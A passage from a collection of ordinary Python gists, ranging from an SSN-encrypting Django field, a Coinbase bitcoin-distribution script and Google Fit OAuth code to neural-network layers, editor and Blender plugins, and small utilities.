match = re.match(ssn_re, value)
block_bytes = 16
while len(value) < block_bytes:
value += ' '
if match:
enc1 = binascii.b2a_hex(encobj1.encrypt(value))
enc2 = binascii.b2a_hex(encobj2.encrypt(enc1))
return unicode(enc2)
else:
raise ValueError(_('Please enter a valid U.S. Social Security Number.'))
def get_prep_lookup(self, lookup_type, value):
if lookup_type == 'exact':
return self.get_prep_value(value)
elif lookup_type == 'isnull':
return value
else:
raise TypeError('Lookup type %r not supported.' % lookup_type)
```
#### File: hard-gists/9ad6a265aac887fa26c1/snippet.py
```python
COINBASE_API_KEY = "YOUR-API-KEY"
COINBASE_API_SECRET = "YOUR-API-SECRET"
from coinbase_passwords import *
import websocket
import json
import logging
import thread
import time
import datetime
# for coinbase stuff
import urllib2
import hashlib
import hmac
# The index number of the next address to use in the deterministic wallet. So,
# if the program just crashed for whatever reason, you would look at the last
# index used to send some BTC, and write that number plus one here.
address_indexer = 38
# Amount BTC to distribute per address. A better system would use a random
# number within some range.
per_address = 0.01
# Number of transactions per block to create. There is no guarantee that each
# transaction will be included in each block. Some might appear in future
# blocks, so the transaction count might be anywhere between 0 and the the
# total number of transactions that have been attempted but not yet included in
# a block. This number controls the creation of new transactions per block. A
# better system might monitor for unconfirmed transactions, and only create new
# transactions once the previous transactions have been confirmed at least
# once so that the total balance doesn't end up tied up in lousy unconfirmed
# transactions. A better system would use a random number within some range
# (including zero in that range).
transactions_per_block = 4
# Also, there is a minor incentive to keep the number of transactions per block
# low. In particular, and especially if you choose a high-entropy number for
# the value of "per_address", it will be easy for others to guess that the
# other addresses belong to you because the same account balances are being
# transferred. Similarly, a large increase in the number of small-value
# transactions in the blockchain in a given block is another piece of
# information that can be used to correlate the addresses as probably belonging
# to the same owner. For these reasons and others, splitting up the
# transactions into separate blocks helps to obfuscate your presence at least a
# little.
max_transactions = 1000
# sudo apt-get install electrum
# https://bitcointalk.org/index.php?topic=612143.0
import electrum
# load default electrum configuration
config = electrum.SimpleConfig()
storage = electrum.wallet.WalletStorage(config)
wallet = electrum.wallet.Wallet(storage)
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(message)s')
log = logging.getLogger(__name__)
def get_total_balance(wallet=wallet):
"""
:return: total balance in satoshis (confirmed)
"""
#return wallet.get_account_balance(0)[0]
return wallet.get_balance()[0]
def get_address_balance(address, wallet=wallet):
"""
:param address: some address
:return: confirmed address balance in satoshis
"""
return wallet.get_addr_balance(address)[0]
def get_nth_address(number, wallet=wallet):
"""
Generate the nth address. Doesn't generate change addresses.
:param number: the numberth public address to generate
:return: address
"""
return wallet.accounts[0].get_address(0, number)
def get_first_address_with_zero_balance(wallet=wallet, minimum=0, limit=10000):
"""
Find an address that has a balance of zero. Ideally this would find an
address that hasn't been used before, because it is possible that it will
find an address that has been previously used and emptied back to zero.
A better system would check the blockchain and find the first unused
address, and then rename this function appropriately.
:param limit: Number of search cycles to employ after exhausting
pre-generated list of addresses.
:param minimum: first usable address (skip everything before) (useful for
resuming)
:return: (number, address)
"""
for (number, address) in enumerate(wallet.addresses()):
balance = get_address_balance(address, wallet=wallet)
if balance == 0 and number >= minimum:
return (number, address)
else:
# Exhausted pre-generated addresses. Search for next address that has
# zero balance.
counter = number
while counter <= limit:
address = get_nth_address(counter, wallet=wallet)
balance = get_address_balance(address, wallet=wallet)
if balance == 0 and counter >= minimum:
return (counter, address)
counter += 1
# Really I shouldn't use a limit, but I'm skeptical that 10,000
# addresses are really in use. Human intervention required..
raise Exception("Couldn't find an address with an empty balance.")
def execute_coinbase_http(url, body=None):
"""
https://coinbase.com/docs/api/authentication
"""
# just a precaution..
if "https" not in url:
raise Exception("i don't think so, tim")
opener = urllib2.build_opener()
nonce = int(time.time() * 1e6)
message = str(nonce) + url + ('' if body is None else body)
signature = hmac.new(COINBASE_API_SECRET, message, hashlib.sha256).hexdigest()
opener.addheaders = [('ACCESS_KEY', COINBASE_API_KEY),
('ACCESS_SIGNATURE', signature),
('ACCESS_NONCE', nonce)]
try:
return opener.open(urllib2.Request(url, body, {'Content-Type': 'application/json'}))
except urllib2.HTTPError as e:
print e
return e
def send_btc(amount, address):
"""
Use coinbase.com to send some BTC to an address. The amount is in units of
BTC. When the transaction is successfully created, coinbase.com will return
some json with the "success" key set to json true.
"""
# Don't debug with httpbin while the headers are enabled in
# execute_coinbase_http.
#url = "http://httpbin.org/post"
url = "https://coinbase.com/api/v1/transactions/send_money"
body = json.dumps({
"transaction": {
"to": address,
"amount": amount,
},
})
response = execute_coinbase_http(url, body=body)
content = json.loads(response.read())
return content
class BlockchainInfoWebSocketAPI(object):
"""
http://blockchain.info/api/api_websocket
"""
url = "ws://ws.blockchain.info/inv"
@staticmethod
def on_open(ws):
"""
Spawn a function that pings blockchain.info every 30 seconds so that
the websocket connection doesn't get killed from that end.
"""
def run(*args):
# subscribe to blocks
BlockchainInfoWebSocketAPI.subscribe_to_blocks(ws)
# ping every 25 seconds to prevent remote server from disconnecting
while 1:
log.debug("BlockchainInfoWebSocketAPI: doing heartbeat ping to blockchain.info")
ws.send("")
time.sleep(25)
# run the "run" method in a new thread
thread.start_new_thread(run, ())
@staticmethod
def on_close(ws):
log.info("BlockchainInfoWebSocketAPI: closing websocket connection")
@staticmethod
def on_error(ws, error):
log.exception("BlockchainInfoWebSocketAPI error: " + error)
@staticmethod
def on_message(ws, message):
global transactions_per_block
global per_address
global address_indexer
data = json.loads(message)
if data["op"] == "block":
log.info("BlockchainInfoWebSocketAPI: received new block")
i = 0
while i < transactions_per_block:
amount = per_address
(latest_index, address) = get_first_address_with_zero_balance(minimum=address_indexer)
log.info("BlockchainInfoWebSocketAPI: sending {amount} BTC to address #{num} - {address}".format(
amount=amount,
num=latest_index,
address=address,
))
response = send_btc(str(amount), address)
log.info("BlockchainInfoWebSocketAPI: coinbase.com request successful? " + str(response["success"]))
log.info(response)
# Kinda lying, it's really just an indexer, so point it to the
# next one please.
address_indexer = latest_index + 1
i += 1
@staticmethod
def subscribe_to_blocks(ws):
"""
Communicates with blockchain.info to subscribe to block notifications.
Use blocks_sub for blocks. The ping_block operation is used only for
debugging (it immediately pings the last known block).
"""
ws.send('{"op":"blocks_sub"}')
# ws.send('{"op":"ping_block"}')
@staticmethod
def _run_forever():
log.info("BlockchainInfoWebSocketAPI: begin blockchain.info websocket connection")
ws = websocket.WebSocketApp(
BlockchainInfoWebSocketAPI.url,
on_message=BlockchainInfoWebSocketAPI.on_message,
on_error=BlockchainInfoWebSocketAPI.on_error,
on_close=BlockchainInfoWebSocketAPI.on_close,
on_open=BlockchainInfoWebSocketAPI.on_open,
)
ws.run_forever()
return ws
@staticmethod
def run_forever():
delay = 1
while 1:
# try to use run_forever, wait between with an exponential backoff
try:
BlockchainInfoWebSocketAPI._run_forever()
except websocket.WebSocketException, exc:
log.exception(exc)
log.warning("BlockchainInfoWebSocketAPI: will attempt to restart connection in {0} seconds...".format(delay))
time.sleep(delay)
delay *= 2
except Exception, exc:
raise exc
def quick_time_estimate(per_address, transactions_per_block, max_transactions):
"""
Estimate the total BTC to distribute, how many blocks to use, how many
hours this will probably take (assuming 10 minutes per block), and an
estimated timestamp for when everything will be done.
"""
total_btc = per_address * max_transactions
# Number of required blocks is based on the total number of transactions.
blocks = float(max_transactions) / float(transactions_per_block)
# each block takes 10 minutes (uh, on average, or rather, that's the target)
minutes = blocks * 10
# each hour takes 60 minutes
hours = minutes / 60
timefuture = datetime.datetime.now() + datetime.timedelta(minutes=minutes)
return (total_btc, blocks, hours, timefuture)
def dump_estimates(
per_address=per_address,
transactions_per_block=transactions_per_block,
max_transactions=max_transactions,
):
(total_btc, blocks, hours, timefuture) = quick_time_estimate(per_address, transactions_per_block, max_transactions)
output = "total_btc: {total_btc}\n"
output += "blocks: {blocks}\n"
output += "hours: {hours}\n"
output += "approximately done at: {timefuture}"
output = output.format(
total_btc=total_btc,
blocks=blocks,
hours=hours,
timefuture=timefuture,
)
return output
if __name__ == "__main__":
print dump_estimates(), "\n"
BlockchainInfoWebSocketAPI.run_forever()
```
#### File: hard-gists/9f6118ff84867e89f3348707c7a1271f/snippet.py
```python
import torch.utils.data
from torchvision import datasets, transforms
class PartialDataset(torch.utils.data.Dataset):
def __init__(self, parent_ds, offset, length):
self.parent_ds = parent_ds
self.offset = offset
self.length = length
assert len(parent_ds)>=offset+length, Exception("Parent Dataset not long enough")
super(PartialDataset, self).__init__()
def __len__(self):
return self.length
def __getitem__(self, i):
return self.parent_ds[i+self.offset]
def validation_split(dataset, val_share=0.1):
"""
Split a (training and vaidation combined) dataset into training and validation.
Note that to be statistically sound, the items in the dataset should be statistically
independent (e.g. not sorted by class, not several instances of the same dataset that
could end up in either set).
inputs:
dataset: ("training") dataset to split into training and validation
val_share: fraction of validation data (should be 0<val_share<1, default: 0.1)
returns: input dataset split into test_ds, val_ds
"""
val_offset = int(len(dataset)*(1-val_share))
return PartialDataset(dataset, 0, val_offset), PartialDataset(dataset, val_offset, len(dataset)-val_offset)
mnist_train_ds = datasets.MNIST(os.path.expanduser('~/data/datasets/mnist'), train=True, download=True,
transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
]))
train_ds, val_ds = validation_split(mnist_train_ds)
train_loader = torch.utils.data.DataLoader(train_ds, batch_size=64, shuffle=True, **kwargs)
val_loader = torch.utils.data.DataLoader(val_ds, batch_size=64, shuffle=True, **kwargs)
```
#### File: hard-gists/9fbbf2f450779bde60c3/snippet.py
```python
import numpy as np
from numpy import random
from sklearn import base
class PUWrapper(object):
def __init__(self,trad_clf,n_fold=5):
self._trad_clf=trad_clf
self._n_fold=n_fold
def fit(self,X,s):
self._trad_clf.fit(X,s)
Xp=X[s==1]
n=len(Xp)
cv_split=np.arange(n)*self._n_fold/n
cv_index=cv_split[random.permutation(n)]
cs=np.zeros(self._n_fold)
for k in xrange(self._n_fold):
Xptr=Xp[cv_index==k]
cs[k]=np.mean(self._trad_clf.predict_proba(Xptr)[:,1])
self.c_=cs.mean()
return self
def predict_proba(self,X):
proba=self._trad_clf.predict_proba(X)
return proba
def predict(self,X):
proba=self.predict_proba(X)[:,1]
return proba>=(0.5*self.c_)
```
#### File: hard-gists/a003ace716c278ab87669f2fbd37727b/snippet.py
```python
import math
from functools import wraps
from theano import tensor as T
from theano.sandbox.rng_mrg import MRG_RandomStreams as RandomStreams
from lasagne import init
from lasagne.random import get_rng
__all__ = ['Accumulator', 'NormalApproximation', 'NormalApproximationScMix', 'bbpwrap']
c = - 0.5 * math.log(2 * math.pi)
def log_normal(x, mean, std, eps=0.0):
std += eps
return c - T.log(T.abs_(std)) - (x - mean) ** 2 / (2 * std ** 2)
def log_normal3(x, mean, rho, eps=0.0):
std = T.log1p(T.exp(rho))
return log_normal(x, mean, std, eps)
class Accumulator(object):
def __init__(self):
"""
A simple class for accumulating any cost
Used in layers with BayesianMeta
"""
self.srng = RandomStreams(get_rng().randint(1, 2147462579))
self.total = []
def get_cost(self):
return sum(map(T.sum,self.total))
def add_cost(self, new):
self.total.append(new)
class NormalApproximation(object):
def __init__(self, pm=0, pstd=T.exp(-3)):
self.pm = pm
self.pstd = pstd
def log_prior(self, x):
return log_normal(x, self.pm, self.pstd)
def __call__(self, layer, spec, shape, **tags):
# case when user uses default init specs
if not isinstance(spec, dict):
spec = {'mu': spec}
# important!
# we declare that params we add next
# are the ones we need to fit the distribution
tags['variational'] = True
rho_spec = spec.get('rho', init.Normal(1))
mu_spec = spec.get('mu', init.Normal(1))
rho = layer.add_param(rho_spec, shape, **tags)
mean = layer.add_param(mu_spec, shape, **tags)
e = layer.acc.srng.normal(shape, std=1)
W = mean + T.log1p(T.exp(rho)) * e
q_p = self.log_posterior_approx(W, mean, rho) - self.log_prior(W)
layer.acc.add_cost(q_p)
return W
@staticmethod
def log_posterior_approx(W, mean, rho):
return log_normal3(W, mean, rho)
class NormalApproximationScMix(NormalApproximation):
def __init__(self, pm1=.0, pstd1=.5, pi=.5, pm2=.0, pstd2=1e-3):
"""
:param pi:
weight for first Gaussian
pi is in [0, 1]
:param pm1: float
prior mean for first Gaussian
:param std1:
prior std for first Gaussian
:param pm2:
prior mean for second Gaussian
:param std2:
prior std for second Gaussian
"""
assert .0 <= pi <= 1., 'Weight %d not in [0, 1]' % pi
self.pi = pi
self.pm1 = pm1
self.pstd1 = pstd1
self.pm2 = pm2
self.pstd2 = pstd2
def log_prior(self, x):
return self.pi * log_normal(x, self.pm1, self.pstd1) + \
(1 - self.pi) * log_normal(x, self.pm2, self.pstd2)
def bbpwrap(approximation=NormalApproximation()):
def decorator(cls):
def add_param_wrap(add_param):
@wraps(add_param)
def wrapped(self, spec, shape, name=None, **tags):
# we should take care about some user specification
# to avoid bbp hook just set tags['variational'] = True
if not tags.get('trainable', True) or tags.get('variational', False):
return add_param(self, spec, shape, name, **tags)
else:
# they don't need to be regularized, strictly
tags['regularizable'] = False
param = self.approximation(self, spec, shape, **tags)
return param
return wrapped
def init_wrap(__init__):
@wraps(__init__)
def wrapped(self, acc, *args, **kwargs):
self.acc = acc # type: Accumulator
__init__(self, *args, **kwargs)
return wrapped
cls.approximation = approximation
cls.add_param = add_param_wrap(cls.add_param)
cls.__init__ = init_wrap(cls.__init__)
return cls
return decorator
```
#### File: hard-gists/a027a9fc5aac66e6a382/snippet.py
```python
import wx
import serial
# A new custom class that extends the wx.Frame
class MyFrame(wx.Frame):
def __init__(self, parent, title):
super(MyFrame, self).__init__(parent, title=title,
size=(250, 150))
# Attach the paint event to the frame
self.Bind(wx.EVT_PAINT, self.OnPaint)
# Create a timer for redrawing the frame every 100 milliseconds
self.Timer = wx.Timer(self)
self.Timer.Start(100)
self.Bind(wx.EVT_TIMER, self.OnPaint)
# Show the frame
self.Centre()
self.Show()
def OnPaint(self, event=None):
# Create the paint surface
dc = wx.PaintDC(self)
# Refresh the display
self.Refresh()
# Get data from serial port
value = arduino.readline()
# Draw the serial data
# Set up colors:
thickness = 4
border_color = "#990000"
fill_color = "#FF944D"
dc.SetPen(wx.Pen(border_color, thickness))
dc.SetBrush(wx.Brush(fill_color))
# Draw a line
dc.DrawLine(50, 40, 50+value, 40)
# Draw a rectangle
dc.DrawRectangle(50,50,value,50)
# Main program
if __name__ == '__main__':
# Connect to serial port first
try:
arduino = serial.Serial('/dev/tty.usbmodem1421', 9600)
except:
print "Failed to connect"
exit()
# Create and launch the wx interface
app = wx.App()
MyFrame(None, 'Serial data test')
app.MainLoop()
# Close the serial connection
arduino.close()
```
#### File: hard-gists/a303721443f5eb46035e/snippet.py
```python
import Skype4Py
def Commands(message, status):
if status == 'SENT' or (status == 'RECEIVED'):
print message.Body
skype = Skype4Py.Skype()
skype.OnMessageStatus = Commands
skype.Attach()
while True:
pass
```
#### File: hard-gists/a5407ce6b5061525e7f2/snippet.py
```python
import sublime, sublime_plugin, time
from os.path import splitext
from os.path import isfile
currentFile = ''
debug = False
class MoveWindowCommand(sublime_plugin.EventListener):
def on_load(self, view):
global currentFile, debug
if view.file_name() == None:
return False
window = sublime.active_window()
if window.num_groups() != 4:
return None
if view.file_name() == currentFile:
return False
currentFile = view.file_name()
if (debug):
print('on_load(): ' + view.file_name())
group, index = window.get_view_index(view)
fileName, fileExtension = splitext(view.file_name())
if fileExtension == '.xml':
window.set_view_index(view, 2, 0)
elif fileExtension == '.tss':
window.set_view_index(view, 1, 0)
elif fileExtension == '.js':
isLib = True
window.set_view_index(view, 0, 0)
window.open_file(view.file_name())
if isfile(fileName.replace('/controllers/','/views/')+'.xml'):
isLib = False
window.open_file(fileName.replace('/controllers/','/views/')+'.xml')
if isfile(fileName.replace('/controllers/','/styles/')+'.tss'):
isLib = False
window.open_file(fileName.replace('/controllers/','/styles/')+'.tss')
if isLib:
window.set_view_index(view, 3, 0)
else:
window.set_view_index(view, 0, 0)
else :
window.set_view_index(view, 3, 0)
window.focus_view(view)
window.focus_group(0)
def on_close(self, view):
global currentFile, debug
if view.file_name() == None:
return None
if (debug):
print('on_close(): ' + view.file_name())
window = sublime.active_window()
if window.num_groups() != 4:
return None
fileName, fileExtension = splitext(view.file_name())
if fileExtension != '.js':
return None
if view.file_name().find("controllers") == -1:
return None
if not isfile(fileName.replace('/controllers/','/views/') + '.xml') or not isfile(fileName.replace('/controllers/','/styles/') + '.tss'):
return None
xmlFileView = window.find_open_file(fileName.replace('/controllers/','/views/')+'.xml')
window.focus_view(xmlFileView)
window.run_command('close_file')
tssFileView = window.find_open_file(fileName.replace('/controllers/','/styles/')+'.tss')
window.focus_view(tssFileView)
window.run_command('close_file')
def on_activated(self, view):
global currentFile, debug
if view.file_name() == None:
return None
if (debug):
print('on_activated(): ' + view.file_name())
window = sublime.active_window()
if window.num_groups() != 4:
return None
group, index = window.get_view_index(view)
fileName, fileExtension = splitext(view.file_name())
if fileExtension != '.js':
return None
if view.file_name() == currentFile:
return None
currentFile = view.file_name()
if (debug):
print('on_activated() - pass: ' + view.file_name())
if view.file_name().find("controllers") != -1 and fileExtension == '.js':
if isfile(fileName.replace('/controllers/','/styles/')+'.tss'):
tssFileView = window.find_open_file(fileName.replace('/controllers/','/styles/')+'.tss')
if tssFileView == None:
return False
sublime.set_timeout(lambda: window.set_view_index(tssFileView, 1, index), 0)
sublime.set_timeout(lambda: window.focus_view(tssFileView), 0)
if isfile(fileName.replace('/controllers/','/views/')+'.xml'):
xmlFileView = window.find_open_file(fileName.replace('/controllers/','/views/')+'.xml')
if xmlFileView == None:
return False
sublime.set_timeout(lambda: window.set_view_index(xmlFileView, 2, index), 1)
sublime.set_timeout(lambda: window.focus_view(xmlFileView), 1)
sublime.set_timeout(lambda: window.focus_group(0), 2)
```
#### File: hard-gists/a5f57e8c9d0aedee285fb6f43cb5900c/snippet.py
```python
import numpy as np
import cv2
from sys import argv
# Gaussian radius (should really be an argument):
r = 21
src, dst = argv[1:]
def get_sharpness(img):
img = img.mean(axis=2)
blurred = cv2.GaussianBlur(img, (r, r), 0)
sharp = np.abs(img - blurred)
return sharp
viddy = cv2.VideoCapture(src)
width = int(viddy.get(3)) # can you tell this API is by C programmers?
height = int(viddy.get(4))
frame_count = int(viddy.get(7))
best_pixels = np.empty((height, width, 3)) # 3 channels
best_sharpness = get_sharpness(best_pixels)
for frame_n in range(frame_count):
print "%s/%s" % (frame_n, frame_count)
okay, frame = viddy.read()
if not okay: break
if frame_n == 0:
best_pixels = frame
sharpness = get_sharpness(frame)
better_indexes = np.where(sharpness > best_sharpness)
best_pixels[better_indexes] = frame[better_indexes]
best_sharpness[better_indexes] = sharpness[better_indexes]
cv2.imwrite(dst, best_pixels)
```
#### File: hard-gists/a67517621c2a9d4c2f14/snippet.py
```python
from decimal import Decimal
from geopy.distance import great_circle # or distance
from seuapp.models import Store
# decimal places degrees distance
# --------------- ------- --------
# 0 1 111 km
# 1 0.1 11.1 km
# 2 0.01 1.11 km
# 3 0.001 111 m
# 4 0.0001 11.1 m
# 5 0.00001 1.11 m
# 6 0.000001 11.1 cm
#
# Model fields must looks like:
# # lat/long with 6 decimal places lead to precision of ~0.11 meters.
# lat = DecimalField(
# max_digits=10, decimal_places=6,
# validators=[
# MinValueValidator(
# -90, _("Latitude values must be greater than -90.")
# ),
# MaxValueValidator(90, _("Latitude values must be lower than 90."))
# ]
# )
# lng = DecimalField(
# max_digits=10, decimal_places=6,
# validators=[
# MinValueValidator(
# -180, _("Longitude values must be greater than -180.")
# ),
# MaxValueValidator(
# 180, _("Longitude values must be lower than 180.")
# )
# ]
# )
PRECISION_MAP = {
0: Decimal('1.0'), # -/+ 111 km
1: Decimal('0.1'), # -/+ 11.1 km
2: Decimal('0.01'), # -/+ 1.11 km
3: Decimal('0.001'), # -/+ 111 m
4: Decimal('0.0001'), # -/+ 11.1 m
5: Decimal('0.00001'), # -/+ 1.11 m
6: Decimal('0.000001') # -/+ 11.1 cm
}
def find_nearest_storen(lat, lng):
"""
Find nearest store to given latitude/longitude.
"""
store = None
precison = 6
while store is None:
results = {} # dict is already sorted from lower to greater ;)
# now I would love a graph database ;)
_range = PRECISION_MAP[precison]
stores = Store.objects.filter(
# Here we search around a range. 9 is a modifier in _range to
# be a bit more wide, specially in depth precisions. More stations
# per loop means less queries.
lat__gt=lat - (_range * 9), lat__lt=lat + (_range * 9),
lng__gt=lng - (_range * 9), lng__lt=lng + (_range * 9)
)
for _store in stores:
d = great_circle((lat, lng), (_store.lat, _store.lng))
results[d] = _store
if results:
store = results.values()[0]
break
else:
precison -= 1
return store
```
#### File: hard-gists/a86b412988cbf5216aa5c48b1cf439c4/snippet.py
```python
import re
import clipboard
import console
import webbrowser
import urllib
import contacts
import datetime
import dialogs
def extract_num(input):
match = re.findall("[0-9*]",input)
return ''.join(match)
# Fetch text from clipboard and extract what looks like a phone number
input = clipboard.get()
match = re.search("[0-9\+\-\ ]{7,}",input)
output = match.group(0)
clipboard.set(output)
console.hud_alert(output,icon='success',duration=1)
# Check if the number exists in the phonebook
people = contacts.get_all_people()
found = False
for p in people:
for n in p.phone:
# Numbers can be stored strangely in contacts so just check the last 9 digits
num = extract_num(output)
cleannum = extract_num(n[1])
if (num[-9:] == cleannum[-9:]):
found = True
# Pop a form to add the contact if not found
if not found:
fields = [ {'type':'text','key':'first','value':'','title':'First Name'},{'type':'text','key':'last','value':'','title':'Last Name'},{'type':'text','key':'org','value':'','title':'Organisation'},{'type':'text','key':'num','value':output,'title':'Number'}, {'type':'text','key':'note','value':'Added by Make Call script on '+datetime.datetime.now().ctime(),'title':'Notes'} ]
fields = dialogs.form_dialog('Add a Contact', fields)
newContact = contacts.Person()
newContact.note = fields['note']
newContact.first_name = fields['first']
newContact.last_name = fields['last']
newContact.organization = fields['org']
newContact.phone = [(contacts.WORK,fields['num'])]
contacts.add_person(newContact)
contacts.save()
# Call the number
webbrowser.open('tel:'+urllib.quote(output))
```
#### File: hard-gists/a8c96f1aeb41393dadf6/snippet.py
```python
import json
import httplib2
from datetime import datetime
from apiclient.discovery import build
from oauth2client.client import OAuth2WebServerFlow
# Copy your credentials from the Google Developers Console
CLIENT_ID = 'XXXXXXXXXXXXXXXXXX.apps.googleusercontent.com'
CLIENT_SECRET = '<KEY>'
# Check https://developers.google.com/fit/rest/v1/reference/users/dataSources/datasets/get
# for all available scopes
OAUTH_SCOPE = 'https://www.googleapis.com/auth/fitness.activity.read'
# DATA SOURCE
DATA_SOURCE = "derived:com.google.step_count.delta:com.google.android.gms:estimated_steps"
# The ID is formatted like: "startTime-endTime" where startTime and endTime are
# 64 bit integers (epoch time with nanoseconds).
DATA_SET = "1051700038292387000-1451700038292387000"
# Redirect URI for installed apps
REDIRECT_URI = 'urn:ietf:wg:oauth:2.0:oob'
def retrieve_data():
"""
Run through the OAuth flow and retrieve credentials.
Returns a dataset (Users.dataSources.datasets):
https://developers.google.com/fit/rest/v1/reference/users/dataSources/datasets
"""
flow = OAuth2WebServerFlow(CLIENT_ID, CLIENT_SECRET, OAUTH_SCOPE, REDIRECT_URI)
authorize_url = flow.step1_get_authorize_url()
print 'Go to the following link in your browser:'
print authorize_url
code = raw_input('Enter verification code: ').strip()
credentials = flow.step2_exchange(code)
# Create an httplib2.Http object and authorize it with our credentials
http = httplib2.Http()
http = credentials.authorize(http)
fitness_service = build('fitness', 'v1', http=http)
return fitness_service.users().dataSources(). \
datasets(). \
get(userId='me', dataSourceId=DATA_SOURCE, datasetId=DATA_SET). \
execute()
def nanoseconds(nanotime):
"""
Convert epoch time with nanoseconds to human-readable.
"""
dt = datetime.fromtimestamp(nanotime // 1000000000)
return dt.strftime('%Y-%m-%d %H:%M:%S')
if __name__ == "__main__":
# Point of entry in execution mode:
dataset = retrieve_data()
with open('dataset.txt', 'w') as outfile:
json.dump(dataset, outfile)
last_point = dataset["point"][-1]
print "Start time:", nanoseconds(int(last_point.get("startTimeNanos", 0)))
print "End time:", nanoseconds(int(last_point.get("endTimeNanos", 0)))
print "Data type:", last_point.get("dataTypeName", None)
print "Steps:", last_point["value"][0].get("intVal", None)
```
#### File: hard-gists/acbd669af86ecb8f988325084ba7a749/snippet.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as f
import torch.nn.init as init
from torch.autograd import Variable
class ConvGRUCell(nn.Module):
"""
Generate a convolutional GRU cell
"""
def __init__(self, input_size, hidden_size, kernel_size):
super().__init__()
padding = kernel_size // 2
self.input_size = input_size
self.hidden_size = hidden_size
self.reset_gate = nn.Conv2d(input_size + hidden_size, hidden_size, kernel_size, padding=padding)
self.update_gate = nn.Conv2d(input_size + hidden_size, hidden_size, kernel_size, padding=padding)
self.out_gate = nn.Conv2d(input_size + hidden_size, hidden_size, kernel_size, padding=padding)
init.orthogonal(self.reset_gate.weight)
init.orthogonal(self.update_gate.weight)
init.orthogonal(self.out_gate.weight)
init.constant(self.reset_gate.bias, 0.)
init.constant(self.update_gate.bias, 0.)
init.constant(self.out_gate.bias, 0.)
def forward(self, input_, prev_state):
# get batch and spatial sizes
batch_size = input_.data.size()[0]
spatial_size = input_.data.size()[2:]
# generate empty prev_state, if None is provided
if prev_state is None:
state_size = [batch_size, self.hidden_size] + list(spatial_size)
prev_state = Variable(torch.zeros(state_size)).cuda()
# data size is [batch, channel, height, width]
stacked_inputs = torch.cat([input_, prev_state], dim=1)
update = f.sigmoid(self.update_gate(stacked_inputs))
reset = f.sigmoid(self.reset_gate(stacked_inputs))
out_inputs = f.tanh(self.out_gate(torch.cat([input_, prev_state * reset], dim=1)))
new_state = prev_state * (1 - update) + out_inputs * update
return new_state
```
#### File: hard-gists/ae2a7adaab133c61a059/snippet.py
```python
import lasagne as nn
Conv2DLayer = nn.layers.Conv2DDNNLayer
def inception_module(l_in, num_1x1, reduce_3x3, num_3x3, reduce_5x5, num_5x5, gain=1.0, bias=0.1):
"""
inception module (without the 3x3s1 pooling and projection because that's difficult in Theano right now)
"""
shape = l_in.get_output_shape()
out_layers = []
# 1x1
if num_1x1 > 0:
l_1x1 = nn.layers.NINLayer(l_in, num_units=num_1x1, W=nn.init.Orthogonal(gain), b=nn.init.Constant(bias))
out_layers.append(l_1x1)
# 3x3
if num_3x3 > 0:
if reduce_3x3 > 0:
l_reduce_3x3 = nn.layers.NINLayer(l_in, num_units=reduce_3x3, W=nn.init.Orthogonal(gain), b=nn.init.Constant(bias))
else:
l_reduce_3x3 = l_in
l_3x3 = Conv2DLayer(l_reduce_3x3, num_filters=num_3x3, filter_size=(3, 3), border_mode="same", W=nn.init.Orthogonal(gain), b=nn.init.Constant(bias))
out_layers.append(l_3x3)
# 5x5
if num_5x5 > 0:
if reduce_5x5 > 0:
l_reduce_5x5 = nn.layers.NINLayer(l_in, num_units=reduce_5x5, W=nn.init.Orthogonal(gain), b=nn.init.Constant(bias))
else:
l_reduce_5x5 = l_in
l_5x5 = Conv2DLayer(l_reduce_5x5, num_filters=num_5x5, filter_size=(5, 5), border_mode="same", W=nn.init.Orthogonal(gain), b=nn.init.Constant(bias))
out_layers.append(l_5x5)
# stack
l_out = nn.layers.concat(out_layers)
return l_out
```
#### File: hard-gists/af5bc4fae39b16f8d505/snippet.py
```python
bl_info = {
"name": "Import multiple OBJ files",
"author": "poor, JuhaW",
"version": (0, 2, 0),
"blender": (2, 76, 0),
"location": "File > Import-Export",
"description": "Import multiple OBJ files, UV's, materials",
"warning": "",
"wiki_url": "",
"tracker_url": "",
"category": "Import-Export"}
import bpy
import os
from bpy_extras.io_utils import ImportHelper
from bpy.props import (BoolProperty,
FloatProperty,
StringProperty,
EnumProperty,
CollectionProperty
)
class ImportMultipleObjs(bpy.types.Operator, ImportHelper):
"""This appears in the tooltip of the operator and in the generated docs"""
bl_idname = "import_scene.multiple_objs"
bl_label = "Import multiple OBJ's"
bl_options = {'PRESET', 'UNDO'}
# ImportHelper mixin class uses this
filename_ext = ".obj"
filter_glob = StringProperty(
default="*.obj",
options={'HIDDEN'},
)
# Selected files
files = CollectionProperty(type=bpy.types.PropertyGroup)
# List of operator properties, the attributes will be assigned
# to the class instance from the operator settings before calling.
ngons_setting = BoolProperty(
name="NGons",
description="Import faces with more than 4 verts as ngons",
default=True,
)
edges_setting = BoolProperty(
name="Lines",
description="Import lines and faces with 2 verts as edge",
default=True,
)
smooth_groups_setting = BoolProperty(
name="Smooth Groups",
description="Surround smooth groups by sharp edges",
default=True,
)
split_objects_setting = BoolProperty(
name="Object",
description="Import OBJ Objects into Blender Objects",
default=True,
)
split_groups_setting = BoolProperty(
name="Group",
description="Import OBJ Groups into Blender Objects",
default=True,
)
groups_as_vgroups_setting = BoolProperty(
name="Poly Groups",
description="Import OBJ groups as vertex groups",
default=False,
)
image_search_setting = BoolProperty(
name="Image Search",
description="Search subdirs for any associated images "
"(Warning, may be slow)",
default=True,
)
split_mode_setting = EnumProperty(
name="Split",
items=(('ON', "Split", "Split geometry, omits unused verts"),
('OFF', "Keep Vert Order", "Keep vertex order from file"),
),
)
clamp_size_setting = FloatProperty(
name="Clamp Size",
description="Clamp bounds under this value (zero to disable)",
min=0.0, max=1000.0,
soft_min=0.0, soft_max=1000.0,
default=0.0,
)
axis_forward_setting = EnumProperty(
name="Forward",
items=(('X', "X Forward", ""),
('Y', "Y Forward", ""),
('Z', "Z Forward", ""),
('-X', "-X Forward", ""),
('-Y', "-Y Forward", ""),
('-Z', "-Z Forward", ""),
),
default='-Z',
)
axis_up_setting = EnumProperty(
name="Up",
items=(('X', "X Up", ""),
('Y', "Y Up", ""),
('Z', "Z Up", ""),
('-X', "-X Up", ""),
('-Y', "-Y Up", ""),
('-Z', "-Z Up", ""),
),
default='Y',
)
scale_setting = FloatProperty(
name="Size",
description="Scale objects",
min=0.0, max=1000.0,
soft_min=0.0, soft_max=1000.0,
default=1,
)
center_origin = BoolProperty(
name = "Center Origin",
default=True
)
def draw(self, context):
